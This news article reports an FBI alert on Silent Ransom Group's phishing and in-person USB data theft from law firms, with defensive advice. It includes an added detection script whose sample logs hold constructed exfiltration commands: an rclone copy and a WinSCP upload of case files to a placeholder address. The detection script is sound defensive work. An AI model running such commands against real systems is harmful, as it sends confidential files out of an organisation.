
FBI: Hackers Sending Operatives in Person to Insert USB Drives and Steal Data

May 28, 2026  Twila Rosenbaum

The extortion group Silent Ransom Group (SRG) has escalated its tactics and now sends operatives to victims' offices in person to plug in USB drives and steal sensitive data, according to a new alert from the Federal Bureau of Investigation (FBI). Active since at least 2022, SRG initially focused on law firms in the United States, using callback phishing emails and social-engineering phone calls to trick employees into granting remote access. The group typically poses as IT support offering to cancel an unwanted subscription fee. Once given access, it exfiltrates data quickly and usually does not deploy file-encrypting ransomware.

Evolution of SRG Tactics

In a May 2025 alert, the FBI detailed SRG's use of phishing emails containing links to remote access software, enabling attackers to quickly steal data. However, in more recent attacks observed this year, SRG has updated its approach. The gang now directly calls or sends phishing emails urging employees to call a phone number answered by an attacker impersonating IT support. During these calls, the victims are instructed to grant remote desktop access to their machines. If the employee hesitates or the remote attempt fails, SRG sends a physical operative to the victim's location, posing as an IT technician who can fix the issue in person.

“In this scheme, the threat actor tells the victim they need to image the device or create a backup file to address potential impacts from the phishing email,” the FBI explains. The operative brings a USB drive or external hard drive, connects it to the targeted computer, and begins copying data immediately. After gaining access, the FBI notes, SRG escalates privileges and exfiltrates data with legitimate tools such as WinSCP (Windows Secure Copy) or a modified build of Rclone. In some intrusions the stolen data is uploaded to cloud file-sharing services such as Google Drive and Microsoft OneDrive.

Extortion and Pressure Tactics

After successfully exfiltrating data, SRG contacts the victim organization and demands payment, threatening to sell or publicly release the stolen data online. To increase pressure, the group also contacts employees and clients of the victim, making the extortion more personal and urgent. The FBI warns that recent SRG campaigns leave few forensic artifacts on compromised machines, and traditional antivirus products are unlikely to flag the intrusion because the group uses legitimate system management or remote access tools. This stealthy approach makes detection and attribution challenging for security teams.

Background on Silent Ransom Group

Silent Ransom Group first emerged in 2022, primarily targeting law firms, which often handle highly sensitive client information. The group's initial modus operandi involved callback phishing—sending emails that urge recipients to call a provided number, where social engineers guide them through installing remote access software. Over time, SRG has refined its tactics to include in-person interventions, a significant escalation that poses physical security risks to organizations. The FBI's alert underscores that while SRG is not known for deploying ransomware in these latest attacks, the data exfiltration alone can cause devastating financial and reputational damage, especially for law firms bound by strict confidentiality obligations.

Mitigation Recommendations

To prevent SRG attacks, organizations, particularly law firms, are advised to implement a layered security approach. The FBI recommends verifying the identity and authorization of anyone requesting access to company assets, especially those claiming to be IT support. Employees should be trained to identify phishing attempts and to report unusual phone calls or unsolicited visits. Organizations should establish clear policies for how IT support communicates and authenticates, for example requiring a ticket number or manager approval before any remote access is granted.

Technical measures include keeping regular, tested backups of company data, deploying phishing-resistant multi-factor authentication (MFA), and blocking access to commonly exploited ports. Disabling remote access for users who do not need it and restricting which users and workstations may mount removable storage also limit what an operative with physical access can do. Because SRG relies on legitimate tools, the FBI emphasizes that proactive monitoring of network activity and behavioral analytics may be needed to detect anomalous data transfers. In practice that means alerting on the tools themselves, keyed on the binary's original file name and command line rather than its path, and on the timing of their use relative to other events, rather than waiting for an antivirus verdict that is unlikely to come.
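The following script is an added illustration of that monitoring idea and is not code from the FBI alert or the article. It hunts Windows endpoint telemetry for the sequence the alert describes: an external storage device is recognized on a host, and shortly afterwards an exfiltration-capable tool (Rclone or WinSCP) runs, possibly under a renamed binary. The sample records are constructed; their fields are modelled on Sysmon Event ID 1 (process creation, which carries OriginalFileName) and Security Event ID 6416 (new external device recognized). The hostnames, users, paths, the remote address and the 15-minute correlation window are all assumptions.

```python
"""Hunt for the SRG pattern in Windows endpoint telemetry.

Added illustration, not the FBI's or the article's code. Sample records are
constructed; fields follow Sysmon EID 1 (process creation, OriginalFileName)
and Security EID 6416 (new external device recognized). Names, paths, the
remote address and the correlation window are assumptions.
"""
import json
import re
from datetime import datetime, timedelta

EXFIL_TOOLS = {"rclone.exe", "winscp.exe"}      # matched on OriginalFileName
CORRELATION_WINDOW = timedelta(minutes=15)      # assumption: device -> tool run
# rclone's "<verb> <source> <remote>:<path>" syntax survives a renamed binary
# and a log source without OriginalFileName (e.g. Security 4688).
RCLONE_CMD = re.compile(r"\b(copy|sync|move)\s+\S+\s+\S+:", re.IGNORECASE)

# Constructed JSON-lines sample (backslashes doubled for JSON). The first
# rclone run is renamed to svchost.exe on a removable drive; the last two
# process events are benign or merely worth a look.
SAMPLE_EVENTS = r"""
{"ts":"2026-05-20T09:58:11","eid":6416,"host":"LAW-WS07","user":"LAW\\jdoe","device":"USB\\VID_0781&PID_5583\\0401","class":"DiskDrive"}
{"ts":"2026-05-20T10:01:42","eid":1,"host":"LAW-WS07","user":"LAW\\jdoe","image":"E:\\tools\\svchost.exe","orig":"rclone.exe","cmdline":"svchost.exe copy C:\\Matters\\ remote:cases --transfers 16"}
{"ts":"2026-05-20T10:03:05","eid":1,"host":"LAW-WS07","user":"LAW\\jdoe","image":"C:\\Program Files (x86)\\WinSCP\\WinSCP.exe","orig":"winscp.exe","cmdline":"WinSCP.exe /command \"open sftp://ops@203.0.113.10\" \"put C:\\Matters\\*\""}
{"ts":"2026-05-20T11:15:00","eid":1,"host":"LAW-WS02","user":"LAW\\asmith","image":"C:\\Windows\\System32\\svchost.exe","orig":"svchost.exe","cmdline":"svchost.exe -k netsvcs"}
{"ts":"2026-05-20T14:20:00","eid":1,"host":"LAW-WS11","user":"LAW\\bchen","image":"C:\\Users\\Public\\r.exe","cmdline":"r.exe sync C:\\Matters gd:cases --transfers 8"}
{"ts":"2026-05-21T08:30:00","eid":1,"host":"LAW-WS02","user":"LAW\\asmith","image":"C:\\Program Files (x86)\\WinSCP\\WinSCP.exe","orig":"winscp.exe","cmdline":"WinSCP.exe"}
"""


def parse_events(text):
    """Parse JSON-lines telemetry into dicts with datetime timestamps, oldest first."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def basename(path):
    """Last component of a Windows or POSIX path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt(events):
    """Flag exfil-tool executions; raise to 'high' when the binary is renamed
    or an external device was recognized on the same host within
    CORRELATION_WINDOW beforehand."""
    insertions = {}   # host -> timestamps of Security 6416 events
    findings = []
    for ev in events:
        if ev["eid"] == 6416:
            insertions.setdefault(ev["host"], []).append(ev["ts"])
            continue
        if ev["eid"] != 1:
            continue
        orig = ev.get("orig", "").lower()          # absent in 4688-style logs
        name = basename(ev["image"])
        cmdline = ev.get("cmdline", "")
        reasons = []
        tool = (orig if orig in EXFIL_TOOLS
                else name if name in EXFIL_TOOLS else None)
        if tool:
            reasons.append(f"exfiltration-capable tool executed: {tool}")
        if RCLONE_CMD.search(cmdline):
            reasons.append("rclone-style '<copy|sync|move> <source> <remote>:' command line")
        if not reasons:
            continue
        severity = "medium"
        if orig and name != orig:
            reasons.append(f"binary renamed: on disk as {name}, OriginalFileName {orig}")
            severity = "high"
        prior = [t for t in insertions.get(ev["host"], [])
                 if timedelta(0) <= ev["ts"] - t <= CORRELATION_WINDOW]
        if prior:
            mins = int((ev["ts"] - max(prior)).total_seconds() // 60)
            reasons.append(f"external storage device recognized {mins} min earlier")
            severity = "high"
        findings.append({"ts": ev["ts"].isoformat(), "host": ev["host"],
                         "user": ev["user"], "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(parse_events(SAMPLE_EVENTS)):
        print(f"[{f['severity'].upper()}] {f['ts']} {f['host']} {f['user']}")
        for r in f["reasons"]:
            print("    -", r)
```

On the sample, the renamed Rclone and the WinSCP session on LAW-WS07 both come out "high" because they follow the USB device event by a few minutes, the lone Rclone-syntax run on LAW-WS11 and the idle WinSCP launch on LAW-WS02 are "medium", and the genuine svchost.exe is ignored. Two caveats worth keeping in mind: Security Event 4688 does not record OriginalFileName, so the rename check needs Sysmon or an EDR that exposes PE metadata, and a legitimate admin's WinSCP use will trip the "medium" tier, which is why the device correlation, not the tool name alone, carries the weight.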

The escalation to in-person attacks highlights the need for physical security protocols. Organizations should restrict physical access to offices and require visitor registration for anyone claiming to be a technician. Any unexpected IT visit should be verified through a separate communication channel (e.g., calling the IT department directly using a known number). As cybercriminals become bolder, blending digital and physical tactics, businesses must adapt their defenses accordingly.


Source: SecurityWeek News


